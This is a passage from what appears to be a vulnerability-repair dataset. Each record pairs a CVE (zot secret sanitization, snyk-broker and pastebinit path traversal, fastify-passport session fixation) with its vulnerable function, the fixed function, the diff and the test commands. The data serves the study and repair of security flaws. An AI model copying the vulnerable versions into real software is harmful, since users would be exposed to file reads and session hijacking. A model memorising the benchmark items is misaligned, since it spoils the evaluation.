{\n\t\t\tpanic(err)\n\t\t}\n\n\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n\t}\n\n\tif c.IsEventRecorderEnabled() {\n\t\tfor i, sink := range c.Extensions.Events.Sinks {\n\t\t\tif sink.Credentials == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := DeepCopy(&c.Extensions.Events.Sinks[i], &sanitizedConfig.Extensions.Events.Sinks[i]); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\n\t\t\tsanitizedConfig.Extensions.Events.Sinks[i].Credentials.Password = \"******\"\n\t\t}\n\t}\n\n\treturn sanitizedConfig\n}"}], "fix_func": [{"id": "fix_go_74_1", "commit": "8a99a3e", "file_path": "pkg/api/config/config.go", "start_line": "327", "end_line": "381", "snippet": "func (c *Config) Sanitize() *Config {\n\tsanitizedConfig := &Config{}\n\n\tif err := DeepCopy(c, sanitizedConfig); err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Sanitize HTTP config\n\tif c.HTTP.Auth != nil {\n\t\t// Sanitize LDAP bind password\n\t\tif c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n\t\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n\n\t\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\n\t\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n\t\t}\n\n\t\t// Sanitize OpenID client secrets\n\t\tif c.HTTP.Auth.OpenID != nil {\n\t\t\tsanitizedConfig.HTTP.Auth.OpenID = &OpenIDConfig{\n\t\t\t\tProviders: make(map[string]OpenIDProviderConfig),\n\t\t\t}\n\n\t\t\tfor provider, config := range c.HTTP.Auth.OpenID.Providers {\n\t\t\t\tsanitizedConfig.HTTP.Auth.OpenID.Providers[provider] = OpenIDProviderConfig{\n\t\t\t\t\tName: config.Name,\n\t\t\t\t\tClientID: config.ClientID,\n\t\t\t\t\tClientSecret: \"******\",\n\t\t\t\t\tKeyPath: config.KeyPath,\n\t\t\t\t\tIssuer: config.Issuer,\n\t\t\t\t\tScopes: config.Scopes,\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif c.IsEventRecorderEnabled() {\n\t\tfor i, sink := range c.Extensions.Events.Sinks {\n\t\t\tif sink.Credentials == nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif err := DeepCopy(&c.Extensions.Events.Sinks[i], &sanitizedConfig.Extensions.Events.Sinks[i]); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\n\t\t\tsanitizedConfig.Extensions.Events.Sinks[i].Credentials.Password = \"******\"\n\t\t}\n\t}\n\n\treturn sanitizedConfig\n}"}], "vul_patch": "--- a/pkg/api/config/config.go\n+++ b/pkg/api/config/config.go\n@@ -5,14 +5,36 @@\n \t\tpanic(err)\n \t}\n \n-\tif c.HTTP.Auth != nil && c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n-\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n+\t// Sanitize HTTP 
config\n+\tif c.HTTP.Auth != nil {\n+\t\t// Sanitize LDAP bind password\n+\t\tif c.HTTP.Auth.LDAP != nil && c.HTTP.Auth.LDAP.bindPassword != \"\" {\n+\t\t\tsanitizedConfig.HTTP.Auth.LDAP = &LDAPConfig{}\n \n-\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n-\t\t\tpanic(err)\n+\t\t\tif err := DeepCopy(c.HTTP.Auth.LDAP, sanitizedConfig.HTTP.Auth.LDAP); err != nil {\n+\t\t\t\tpanic(err)\n+\t\t\t}\n+\n+\t\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n \t\t}\n \n-\t\tsanitizedConfig.HTTP.Auth.LDAP.bindPassword = \"******\"\n+\t\t// Sanitize OpenID client secrets\n+\t\tif c.HTTP.Auth.OpenID != nil {\n+\t\t\tsanitizedConfig.HTTP.Auth.OpenID = &OpenIDConfig{\n+\t\t\t\tProviders: make(map[string]OpenIDProviderConfig),\n+\t\t\t}\n+\n+\t\t\tfor provider, config := range c.HTTP.Auth.OpenID.Providers {\n+\t\t\t\tsanitizedConfig.HTTP.Auth.OpenID.Providers[provider] = OpenIDProviderConfig{\n+\t\t\t\t\tName: config.Name,\n+\t\t\t\t\tClientID: config.ClientID,\n+\t\t\t\t\tClientSecret: \"******\",\n+\t\t\t\t\tKeyPath: config.KeyPath,\n+\t\t\t\t\tIssuer: config.Issuer,\n+\t\t\t\t\tScopes: config.Scopes,\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n \t}\n \n \tif c.IsEventRecorderEnabled() {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-48374:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/zot\nrm -rf ./pkg/api/config/config_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestConfig$ zotregistry.dev/zot/pkg/api/config\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-48374:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/zot\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd pkg/api && go test -timeout 30s -v \n"} {"cve_id": "CVE-2020-7649", "cve_description": "This affects the package snyk-broker before 4.73.0. 
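For the CVE-2025-48374 (zot) record that closes above (the CVE-2020-7649 record continues below): the fix extends the config `Sanitize()` step to mask OpenID client secrets before the config is ever logged. A hedged Python sketch of the same mask-before-log idea; the key names and config shape are illustrative, not zot's actual schema:

```python
import copy
import json
import logging

SECRET_KEYS = {"clientsecret", "bindpassword", "password"}

def sanitize(config: dict) -> dict:
    """Deep-copy the config and mask secret-looking values recursively."""
    clean = copy.deepcopy(config)

    def mask(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key.lower() in SECRET_KEYS:
                    node[key] = "******"
                else:
                    mask(value)
        elif isinstance(node, list):
            for item in node:
                mask(item)

    mask(clean)
    return clean

config = {"auth": {"openid": {"providers": {"keycloak": {
    "clientid": "zot", "clientsecret": "hunter2"}}}}}
logging.basicConfig(level=logging.INFO)
# Only the sanitized copy ever reaches the startup log.
logging.info("starting with config %s", json.dumps(sanitize(config)))
```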
It allows arbitrary file reads for users with access to Snyk's internal network via directory traversal.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/snyk/broker", "patch_url": ["https://github.com/snyk/broker/commit/90e0bac07a800b7c4c6646097c9c89d6b878b429"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_54_1", "commit": "57c8741", "file_path": "lib/filters/index.js", "start_line": 11, "end_line": 163, "snippet": "module.exports = ruleSource => {\n let rules = [];\n const config = require('../config');\n\n // polymorphic support\n if (Array.isArray(ruleSource)) {\n rules = ruleSource;\n } else if (ruleSource) {\n try {\n rules = require(ruleSource);\n } catch (error) {\n logger.warn({ ruleSource, error }, 'Unable to parse rule source, ignoring');\n }\n }\n\n if (!Array.isArray(rules)) {\n throw new Error(`Expected array of filter rules, got '${typeof rules}' instead.`);\n }\n\n logger.info({ rulesCount: rules.length }, 'loading new rules');\n\n // array of entries with\n const tests = rules.map(entry => {\n const keys = [];\n let { method, origin, path, valid, stream } = entry;\n method = (method || 'get').toLowerCase();\n valid = valid || [];\n\n const bodyFilters = valid.filter(v => !!v.path && !v.regex);\n const bodyRegexFilters = valid.filter(v => !!v.path && !!v.regex);\n const queryFilters = valid.filter(v => !!v.queryParam);\n\n // now track if there's any values that we need to interpolate later\n const fromConfig = {};\n\n // slightly bespoke version of replace-vars.js\n path = (path || '').replace(/(\\${.*?})/g, (_, match) => {\n const key = match.slice(2, -1); // ditch the wrappers\n fromConfig[key] = config[key] || '';\n return ':' + key;\n });\n\n origin = replace(origin, config);\n\n if (path[0] !== '/') {\n path = '/' + path;\n }\n\n logger.info({ method, path }, 'adding new filter rule');\n const regexp = pathRegexp(path, keys);\n\n return (req) => {\n // check the request method\n if (req.method.toLowerCase() !== method && method !== 'any') {\n return false;\n }\n\n // Discard any fragments before further processing\n const mainURI = req.url.split('#')[0];\n\n // query params might contain additional \"?\"s, only split on the 1st one\n const parts = mainURI.split('?');\n let [url, querystring] = [parts[0], parts.slice(1).join('?')];\n const res = regexp.exec(url);\n if (!res) {\n // no url match\n return false;\n }\n\n // reconstruct the url from the user config\n for (let i = 1; i < res.length; i++) {\n const val = fromConfig[keys[i - 1].name];\n if (val) {\n url = url.replace(res[i], val);\n }\n }\n\n // if validity filters are present, at least one must be satisfied\n if (bodyFilters.length || bodyRegexFilters.length ||\n queryFilters.length) {\n let isValid;\n\n let parsedBody;\n if (bodyFilters.length) {\n parsedBody = tryJSONParse(req.body);\n\n // validate against the body\n isValid = bodyFilters.some(({ 
path, value }) => {\n return undefsafe(parsedBody, path, value);\n });\n }\n\n if (!isValid && bodyRegexFilters.length) {\n parsedBody = parsedBody || tryJSONParse(req.body);\n\n // validate against the body by regex\n isValid = bodyRegexFilters.some(({ path, regex }) => {\n try {\n const re = new RegExp(regex);\n return re.test(undefsafe(parsedBody, path));\n } catch (error) {\n logger.error({error, path, regex},\n 'failed to test regex rule');\n return false;\n }\n });\n }\n\n // no need to check query filters if the request is already valid\n if (!isValid && queryFilters.length) {\n const parsedQuerystring = qs.parse(querystring);\n\n // validate against the querystring\n isValid = queryFilters.some(({ queryParam, values }) => {\n return values.some(value =>\n minimatch(parsedQuerystring[queryParam] || '', value)\n );\n });\n }\n\n if (!isValid) {\n return false;\n }\n }\n\n logger.debug({ path, origin, url, querystring }, 'rule matched');\n\n querystring = (querystring) ? `?${querystring}` : '';\n return {\n url: origin + url + querystring,\n auth: entry.auth && authHeader(entry.auth),\n stream\n };\n };\n });\n\n return (payload, callback) => {\n let res = false;\n logger.debug({ rulesCount: tests.length }, 'looking for a rule match');\n\n for (const test of tests) {\n res = test(payload);\n if (res) {\n break;\n }\n }\n if (!res) {\n return callback(Error('blocked'));\n }\n\n return callback(null, res);\n };\n};"}], "fix_func": [{"id": "fix_js_54_1", "commit": "90e0bac07a800b7c4c6646097c9c89d6b878b429", "file_path": "lib/filters/index.js", "start_line": 12, "end_line": 169, "snippet": "module.exports = ruleSource => {\n let rules = [];\n const config = require('../config');\n\n // polymorphic support\n if (Array.isArray(ruleSource)) {\n rules = ruleSource;\n } else if (ruleSource) {\n try {\n rules = require(ruleSource);\n } catch (error) {\n logger.warn({ ruleSource, error }, 'Unable to parse rule source, ignoring');\n }\n }\n\n if (!Array.isArray(rules)) {\n throw new Error(`Expected array of filter rules, got '${typeof rules}' instead.`);\n }\n\n logger.info({ rulesCount: rules.length }, 'loading new rules');\n\n // array of entries with\n const tests = rules.map(entry => {\n const keys = [];\n let { method, origin, path: entryPath, valid, stream } = entry;\n method = (method || 'get').toLowerCase();\n valid = valid || [];\n\n const bodyFilters = valid.filter(v => !!v.path && !v.regex);\n const bodyRegexFilters = valid.filter(v => !!v.path && !!v.regex);\n const queryFilters = valid.filter(v => !!v.queryParam);\n\n // now track if there's any values that we need to interpolate later\n const fromConfig = {};\n\n // slightly bespoke version of replace-vars.js\n entryPath = (entryPath || '').replace(/(\\${.*?})/g, (_, match) => {\n const key = match.slice(2, -1); // ditch the wrappers\n fromConfig[key] = config[key] || '';\n return ':' + key;\n });\n\n origin = replace(origin, config);\n\n if (entryPath[0] !== '/') {\n entryPath = '/' + entryPath;\n }\n\n logger.info({ method, path: entryPath }, 'adding new filter rule');\n const regexp = pathRegexp(entryPath, keys);\n\n return (req) => {\n // check the request method\n if (req.method.toLowerCase() !== method && method !== 'any') {\n return false;\n }\n\n // Do not allow directory traversal\n if (path.normalize(req.url) !== req.url) {\n return false;\n }\n\n // Discard any fragments before further processing\n const mainURI = req.url.split('#')[0];\n\n // query params might contain additional \"?\"s, only split on the 1st one\n const 
parts = mainURI.split('?');\n let [url, querystring] = [parts[0], parts.slice(1).join('?')];\n const res = regexp.exec(url);\n if (!res) {\n // no url match\n return false;\n }\n\n // reconstruct the url from the user config\n for (let i = 1; i < res.length; i++) {\n const val = fromConfig[keys[i - 1].name];\n if (val) {\n url = url.replace(res[i], val);\n }\n }\n\n // if validity filters are present, at least one must be satisfied\n if (bodyFilters.length || bodyRegexFilters.length ||\n queryFilters.length) {\n let isValid;\n\n let parsedBody;\n if (bodyFilters.length) {\n parsedBody = tryJSONParse(req.body);\n\n // validate against the body\n isValid = bodyFilters.some(({ path, value }) => {\n return undefsafe(parsedBody, path, value);\n });\n }\n\n if (!isValid && bodyRegexFilters.length) {\n parsedBody = parsedBody || tryJSONParse(req.body);\n\n // validate against the body by regex\n isValid = bodyRegexFilters.some(({ path, regex }) => {\n try {\n const re = new RegExp(regex);\n return re.test(undefsafe(parsedBody, path));\n } catch (error) {\n logger.error({error, path, regex},\n 'failed to test regex rule');\n return false;\n }\n });\n }\n\n // no need to check query filters if the request is already valid\n if (!isValid && queryFilters.length) {\n const parsedQuerystring = qs.parse(querystring);\n\n // validate against the querystring\n isValid = queryFilters.some(({ queryParam, values }) => {\n return values.some(value =>\n minimatch(parsedQuerystring[queryParam] || '', value)\n );\n });\n }\n\n if (!isValid) {\n return false;\n }\n }\n\n logger.debug({ path: entryPath, origin, url, querystring }, 'rule matched');\n\n querystring = (querystring) ? `?${querystring}` : '';\n return {\n url: origin + url + querystring,\n auth: entry.auth && authHeader(entry.auth),\n stream\n };\n };\n });\n\n return (payload, callback) => {\n let res = false;\n logger.debug({ rulesCount: tests.length }, 'looking for a rule match');\n\n for (const test of tests) {\n res = test(payload);\n if (res) {\n break;\n }\n }\n if (!res) {\n return callback(Error('blocked'));\n }\n\n return callback(null, res);\n };\n};"}], "vul_patch": "--- a/lib/filters/index.js\n+++ b/lib/filters/index.js\n@@ -22,7 +22,7 @@\n // array of entries with\n const tests = rules.map(entry => {\n const keys = [];\n- let { method, origin, path, valid, stream } = entry;\n+ let { method, origin, path: entryPath, valid, stream } = entry;\n method = (method || 'get').toLowerCase();\n valid = valid || [];\n \n@@ -34,7 +34,7 @@\n const fromConfig = {};\n \n // slightly bespoke version of replace-vars.js\n- path = (path || '').replace(/(\\${.*?})/g, (_, match) => {\n+ entryPath = (entryPath || '').replace(/(\\${.*?})/g, (_, match) => {\n const key = match.slice(2, -1); // ditch the wrappers\n fromConfig[key] = config[key] || '';\n return ':' + key;\n@@ -42,16 +42,21 @@\n \n origin = replace(origin, config);\n \n- if (path[0] !== '/') {\n- path = '/' + path;\n+ if (entryPath[0] !== '/') {\n+ entryPath = '/' + entryPath;\n }\n \n- logger.info({ method, path }, 'adding new filter rule');\n- const regexp = pathRegexp(path, keys);\n+ logger.info({ method, path: entryPath }, 'adding new filter rule');\n+ const regexp = pathRegexp(entryPath, keys);\n \n return (req) => {\n // check the request method\n if (req.method.toLowerCase() !== method && method !== 'any') {\n+ return false;\n+ }\n+\n+ // Do not allow directory traversal\n+ if (path.normalize(req.url) !== req.url) {\n return false;\n }\n \n@@ -123,7 +128,7 @@\n }\n }\n \n- logger.debug({ 
path, origin, url, querystring }, 'rule matched');\n+ logger.debug({ path: entryPath, origin, url, querystring }, 'rule matched');\n \n querystring = (querystring) ? `?${querystring}` : '';\n return {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7649:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/broker\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode test/unit/filters.test.js\n", "unit_test_cmd": null} {"cve_id": "CVE-2018-25059", "cve_description": "A vulnerability was found in pastebinit up to 0.2.2 and classified as problematic. Affected by this issue is the function pasteHandler of the file server.go. The manipulation of the argument r.URL.Path leads to path traversal. Upgrading to version 0.2.3 is able to address this issue. The name of the patch is 1af2facb6d95976c532b7f8f82747d454a092272. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217040.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/jessfraz/pastebinit", "patch_url": ["https://github.com/jessfraz/pastebinit/commit/1af2facb6d95976c532b7f8f82747d454a092272"], "programing_language": "Go", "vul_func": [{"id": "vul_go_264_1", "commit": "edb60577888e36ba5139bee2b8050d8123654ab7", "file_path": "server.go", "start_line": 151, "end_line": 234, "snippet": "func (cmd *serverCommand) pasteHandler(w http.ResponseWriter, r *http.Request) {\n\tif r.URL.Path == \"/\" {\n\t\t// they want the root, make them auth\n\t\tu, p, ok := r.BasicAuth()\n\t\tif (u != username || p != password) || !ok {\n\t\t\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"`+baseuri+`\"`)\n\t\t\tw.WriteHeader(401)\n\t\t\tw.Write([]byte(\"401 Unauthorized\\n\"))\n\t\t\treturn\n\t\t}\n\n\t\thtml, err := cmd.generateIndexHTML()\n\t\tif err != nil {\n\t\t\twriteError(w, fmt.Sprintf(\"generating index html failed: %v\", err))\n\t\t\treturn\n\t\t}\n\n\t\t// write the html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfmt.Fprint(w, html)\n\t\tlogrus.Info(\"index file rendered\")\n\t\treturn\n\t}\n\n\tfilename := filepath.Join(cmd.storage, strings.Trim(r.URL.Path, \"/\"))\n\n\tvar handler func(data []byte) (string, error)\n\n\tif strings.HasSuffix(filename, \"/raw\") {\n\t\t// if they want the raw file serve a text/plain Content-Type\n\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t// trim '/raw' from the filename so we can get the right file\n\t\tfilename = strings.TrimSuffix(filename, \"/raw\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/html\") {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if 
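For the CVE-2020-7649 (snyk-broker) record that ends above (the CVE-2018-25059 record continues below): the fix rejects any request whose URL changes under path normalization. `posixpath.normpath` is a close, though not exact, Python analogue of Node's `path.normalize`, so this sketch should be read as an approximation of the check:

```python
import posixpath

def is_normalized(url_path: str) -> bool:
    # Mirrors the patch's `path.normalize(req.url) !== req.url` test:
    # if normalizing changes the path, it contained ".." or "//"
    # segments, so the request is refused before any rule matching.
    return posixpath.normpath(url_path) == url_path

print(is_normalized("/repos/org/project/contents/file"))  # True
print(is_normalized("/repos/org/../../etc/passwd"))       # False
print(is_normalized("/repos//org/project"))               # False
```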
strings.HasSuffix(filename, \"/ansi\") {\n\t\t// check if they want ansi colored text\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/ansi\")\n\t\t// try to syntax highlight the file\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn fmt.Sprintf(\"%s\\n%s\\n%s\", htmlBegin, terminal.Render(data), htmlEnd), nil\n\t\t}\n\t} else {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\thighlighted, err := syntaxhighlight.AsHTML(data)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\treturn fmt.Sprintf(\"%s\\n%s\\n%s\", htmlBegin, string(highlighted), htmlEnd), nil\n\t\t}\n\t}\n\n\t// check if the file exists\n\tif _, err := os.Stat(filename); os.IsNotExist(err) {\n\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", filename))\n\t\treturn\n\t}\n\n\t// read the file\n\tsrc, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Reading file %s failed: %v\", filename, err))\n\t\treturn\n\t}\n\n\tdata, err := handler(src)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Processing file %s failed: %v\", filename, err))\n\t}\n\n\tio.WriteString(w, data)\n\treturn\n}"}], "fix_func": [{"id": "fix_go_264_1", "commit": "1af2facb6d95976c532b7f8f82747d454a092272", "file_path": "server.go", "start_line": 152, "end_line": 235, "snippet": "func (cmd *serverCommand) pasteHandler(w http.ResponseWriter, r *http.Request) {\n\tif r.URL.Path == \"/\" {\n\t\t// they want the root, make them auth\n\t\tu, p, ok := r.BasicAuth()\n\t\tif (u != username || p != password) || !ok {\n\t\t\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"`+baseuri+`\"`)\n\t\t\tw.WriteHeader(401)\n\t\t\tw.Write([]byte(\"401 Unauthorized\\n\"))\n\t\t\treturn\n\t\t}\n\n\t\thtml, err := cmd.generateIndexHTML()\n\t\tif err != nil {\n\t\t\twriteError(w, fmt.Sprintf(\"generating index html failed: %v\", err))\n\t\t\treturn\n\t\t}\n\n\t\t// write the html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfmt.Fprint(w, html)\n\t\tlogrus.Info(\"index file rendered\")\n\t\treturn\n\t}\n\n\tfilename := filepath.Join(cmd.storage, filepath.FromSlash(path.Clean(\"/\"+strings.Trim(r.URL.Path, \"/\"))))\n\n\tvar handler func(data []byte) (string, error)\n\n\tif strings.HasSuffix(filename, \"/raw\") {\n\t\t// if they want the raw file serve a text/plain Content-Type\n\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\t\t// trim '/raw' from the filename so we can get the right file\n\t\tfilename = strings.TrimSuffix(filename, \"/raw\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/html\") {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn string(data), nil\n\t\t}\n\t} else if strings.HasSuffix(filename, \"/ansi\") {\n\t\t// check if they want ansi colored text\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\tfilename = strings.TrimSuffix(filename, \"/ansi\")\n\t\t// try to syntax highlight the file\n\t\thandler = func(data []byte) (string, error) {\n\t\t\treturn fmt.Sprintf(\"%s\\n%s\\n%s\", htmlBegin, terminal.Render(data), htmlEnd), nil\n\t\t}\n\t} else {\n\t\t// check if they want html\n\t\tw.Header().Set(\"Content-Type\", \"text/html\")\n\t\thandler = func(data []byte) (string, error) {\n\t\t\thighlighted, err := syntaxhighlight.AsHTML(data)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\treturn fmt.Sprintf(\"%s\\n%s\\n%s\", htmlBegin, string(highlighted), htmlEnd), nil\n\t\t}\n\t}\n\n\t// check if the file exists\n\tif _, err := os.Stat(filename); os.IsNotExist(err) {\n\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", r.URL.Path))\n\t\treturn\n\t}\n\n\t// read the file\n\tsrc, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Reading file %s failed: %v\", filename, err))\n\t\treturn\n\t}\n\n\tdata, err := handler(src)\n\tif err != nil {\n\t\twriteError(w, fmt.Sprintf(\"Processing file %s failed: %v\", filename, err))\n\t}\n\n\tio.WriteString(w, data)\n\treturn\n}"}], "vul_patch": "--- a/server.go\n+++ b/server.go\n@@ -22,7 +22,7 @@\n \t\treturn\n \t}\n \n-\tfilename := filepath.Join(cmd.storage, strings.Trim(r.URL.Path, \"/\"))\n+\tfilename := filepath.Join(cmd.storage, filepath.FromSlash(path.Clean(\"/\"+strings.Trim(r.URL.Path, \"/\"))))\n \n \tvar handler func(data []byte) (string, error)\n \n@@ -63,7 +63,7 @@\n \n \t// check if the file exists\n \tif _, err := os.Stat(filename); os.IsNotExist(err) {\n-\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", filename))\n+\t\twriteError(w, fmt.Sprintf(\"No such file or directory: %s\", r.URL.Path))\n \t\treturn\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-29019", "cve_description": "@fastify/passport is a port of passport authentication library for the Fastify ecosystem. Applications using `@fastify/passport` in affected versions for user authentication, in combination with `@fastify/session` as the underlying session management mechanism, are vulnerable to session fixation attacks from network and same-site attackers. fastify applications rely on the `@fastify/passport` library for user authentication. The login and user validation are performed by the `authenticate` function. When executing this function, the `sessionId` is preserved between the pre-login and the authenticated session. Network and same-site attackers can hijack the victim's session by tossing a valid `sessionId` cookie in the victim's browser and waiting for the victim to log in on the website. As a solution, newer versions of `@fastify/passport` regenerate `sessionId` upon login, preventing the attacker-controlled pre-session cookie from being upgraded to an authenticated session. Users are advised to upgrade. 
There are no known workarounds for this vulnerability.\n", "cwe_info": {"CWE-384": {"name": "Session Fixation", "description": "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions."}}, "repo": "https://github.com/fastify/fastify-passport", "patch_url": ["https://github.com/fastify/fastify-passport/commit/43c82c321db58ea3e375dd475de60befbfcf2a11"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_286_1", "commit": "121afaefc8601d3ffcf1b327aff3661ae9acce63", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 25, "end_line": 28, "snippet": " async logIn(request: FastifyRequest, user: any) {\n const object = await this.serializeUser(user, request)\n request.session.set(this.key, object)\n }"}, {"id": "vul_js_286_2", "commit": "121afaefc8601d3ffcf1b327aff3661ae9acce63", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 30, "end_line": 32, "snippet": " async logOut(request: FastifyRequest) {\n request.session.set(this.key, undefined)\n }"}], "fix_func": [{"id": "fix_js_286_1", "commit": "43c82c321db58ea3e375dd475de60befbfcf2a11", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 25, "end_line": 33, "snippet": " async logIn(request: FastifyRequest, user: any) {\n const object = await this.serializeUser(user, request)\n // Handle sessions using @fastify/session\n if (request.session.regenerate) {\n // regenerate session to guard against session fixation\n await request.session.regenerate()\n }\n request.session.set(this.key, object)\n }"}, {"id": "fix_js_286_2", "commit": "43c82c321db58ea3e375dd475de60befbfcf2a11", "file_path": "src/session-managers/SecureSessionManager.ts", "start_line": 35, "end_line": 40, "snippet": " async logOut(request: FastifyRequest) {\n request.session.set(this.key, undefined)\n if (request.session.regenerate) {\n await request.session.regenerate()\n }\n }"}], "vul_patch": "--- a/src/session-managers/SecureSessionManager.ts\n+++ b/src/session-managers/SecureSessionManager.ts\n@@ -1,4 +1,9 @@\n async logIn(request: FastifyRequest, user: any) {\n const object = await this.serializeUser(user, request)\n+ // Handle sessions using @fastify/session\n+ if (request.session.regenerate) {\n+ // regenerate session to guard against session fixation\n+ await request.session.regenerate()\n+ }\n request.session.set(this.key, object)\n }\n\n--- a/src/session-managers/SecureSessionManager.ts\n+++ b/src/session-managers/SecureSessionManager.ts\n@@ -1,3 +1,6 @@\n async logOut(request: FastifyRequest) {\n request.session.set(this.key, undefined)\n+ if (request.session.regenerate) {\n+ await request.session.regenerate()\n+ }\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-10548", "cve_description": "Arbitrary code execution is possible in reduce-css-calc node module <=1.2.4 through crafted css. 
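For the CVE-2023-29019 record that ends above: the fix calls `session.regenerate()` during login so a pre-login session id can never be upgraded. A toy Python session store showing why regeneration defeats fixation; the store itself is invented for the demo:

```python
import secrets

class SessionStore:
    def __init__(self):
        self._sessions = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {}
        return sid

    def login(self, old_sid: str, user: str) -> str:
        # Drop the pre-login id and mint a fresh one, the moral
        # equivalent of the patch's request.session.regenerate():
        # a cookie planted by an attacker never becomes authenticated.
        data = self._sessions.pop(old_sid, {})
        new_sid = self.create()
        self._sessions[new_sid] = {**data, "user": user}
        return new_sid

store = SessionStore()
pre_login = store.create()                  # value an attacker could plant
post_login = store.login(pre_login, "alice")
assert pre_login != post_login              # the fixated id is now useless
```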
